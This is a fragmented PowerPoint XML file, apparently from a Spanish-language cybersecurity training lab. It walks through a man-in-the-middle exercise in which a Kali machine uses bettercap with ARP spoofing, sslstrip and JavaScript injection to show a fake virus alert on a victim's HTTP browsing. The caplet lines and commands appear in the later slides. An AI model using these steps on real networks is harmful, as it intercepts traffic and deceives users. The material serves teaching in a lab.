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0400"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Source Sans Pr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gLxI6nQJUqYsPkW1QX4IsEL2ZQ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4">
  <p:cSld name="Izenburua_v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18" name="Google Shape;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1">
  <p:cSld name="Bideoa_v1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="0"/>
          </a:scheme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2">
  <p:cSld name="Bideoa_v2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:alpha val="0"/>
          </a:scheme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2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1">
  <p:cSld name="Amaiera_v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2" name="Google Shape;8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4" name="Google Shape;84;p23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3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Barrio Zamalbide s/n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86" name="Google Shape;8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2">
  <p:cSld name="Amaiera_v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2" name="Google Shape;9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4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4" name="Google Shape;94;p24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4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Barrio Zamalbide s/n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96" name="Google Shape;9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4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1_Atala_v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:\Mi unidad\ana\Tknika\LOGOs TKNIKA\header_ppt_unevoc.png" id="26" name="Google Shape;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0" name="Google Shape;3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33" name="Google Shape;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1">
  <p:cSld name="Izenburua_v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7" name="Google Shape;37;p1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39" name="Google Shape;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2">
  <p:cSld name="Izenburua_v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3" name="Google Shape;43;p1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45" name="Google Shape;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6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3">
  <p:cSld name="Izenburua_v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50" name="Google Shape;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1">
  <p:cSld name="Atala_v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4" name="Google Shape;5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:\Mi unidad\ana\Tknika\LOGOs TKNIKA\header_ppt_unevoc.png" id="56" name="Google Shape;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3">
  <p:cSld name="Atala_v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s-E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3" name="Google Shape;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4">
  <p:cSld name="Atala_v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7" name="Google Shape;6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0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s-E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71" name="Google Shape;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780950" y="2132856"/>
            <a:ext cx="104411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Mensaje fraudulento al navegar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Comprobar</a:t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En la máquina </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Estazioa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>, intenta navegar a cualquier página http. Te aparecerá un mensaje fraudulento.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798" y="2564904"/>
            <a:ext cx="6313665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6000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-E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ATENCIÓN!!! </a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:srgbClr val="95373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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-E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Los métodos de este documento pueden ser ilegales, por lo que no podrás utilizarlos fuera de un entorno de laboratorio.</a:t>
            </a:r>
            <a:endParaRPr sz="32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Esquema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Detalles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Técnicas utilizadas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Explicación.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Pasos iniciales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Atacar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Comprobar</a:t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Esquema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14" y="1251097"/>
            <a:ext cx="10066290" cy="527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 rot="1841012">
            <a:off x="6818187" y="2273060"/>
            <a:ext cx="360040" cy="17999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flipH="1" rot="-5400000">
            <a:off x="4792679" y="2126474"/>
            <a:ext cx="588830" cy="432048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76923C"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="5715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8687494" y="1340768"/>
            <a:ext cx="1008112" cy="230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s-E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Atacante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8895427" y="3039466"/>
            <a:ext cx="698165" cy="230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ES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Víctima</a:t>
            </a:r>
            <a:endParaRPr b="1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5375126" y="3890763"/>
            <a:ext cx="1296145" cy="307777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Iruzur-mezua</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="14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Detalles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Máquinas a mantener encendidas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>: 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Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800"/>
              <a:t>(192.168.222.222</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>.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Estazioa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800"/>
              <a:t>(192.168.222.100)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>).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Router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800"/>
              <a:t>(192.168.222.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>).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 b="1">
              <a:solidFill>
                <a:srgbClr val="366092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Víctima:</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t> Estazioa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/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Atacante: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>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Objetivo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>mostrar al usuario un mensaje fraudulento al realizar una navegación http en la máquina </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Estazioa</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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Técnicas utilizadas</a:t>
            </a:r>
            <a:endParaRPr/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MitM: colocarás la máquina Kali en medio de las comunicaciones entre las máquinas </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Estazioa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>.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Explicación</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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622598" y="1484784"/>
            <a:ext cx="10944608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En el atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>(Kali),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> atraparás el tráfico http de la víctima (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Estazioa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>). Insertarás un mensaje para cuando cuando la víctima realice las solicitudes http.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Al llevar a cabo una navegación http en la víctima, se le mostrará a ésta el mensaje fraudulento programado en el atacante.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Este mensaje fraudulento, por sí solo, no causará daños al propio dispositivo de la víctima. La cuestión es que la información mostrada por el mensaje puede ser falsa, y el hecho de que el usuario del ordenador víctima se la crea puede perjudicar a la organización.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Pasos iniciales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Instalar la colección de herramientas </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>dsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> en la máquina </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Kali.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Sudo apt install bettercap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Comprobación de la conexión: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s-ES"/>
              <a:t>Puedes hacer ping entre tres máquinas, en cualquier sentido.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s-ES"/>
              <a:t>Puedes navegar por Internet en </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> máquina </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es-ES"/>
              <a:t>Estazioa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-34658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2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600"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Atacar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162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334566" y="1772816"/>
            <a:ext cx="10944608" cy="43924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máquina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Kali,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 el fichero injects.cap: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continuación utiliza la herramienta </a:t>
            </a:r>
            <a:r>
              <a:rPr i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bettercap,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ejecutando el comando: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udo bettercap -caplet injectjs.cap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07" y="2288886"/>
            <a:ext cx="5400040" cy="168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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953777" y="2413673"/>
            <a:ext cx="4740288" cy="144016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arp.spoof.targets 'INSERT the target:'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arp.spoof.fullduplex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http.proxy.injectjs Alert ("virus. Apaga todos los dispositivos ahora mismo y espera a que llegue el responsable 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http.proxy.sslstrip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http.proxy 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net.probe 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arp.spoof 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9062" y="4619478"/>
            <a:ext cx="3168352" cy="148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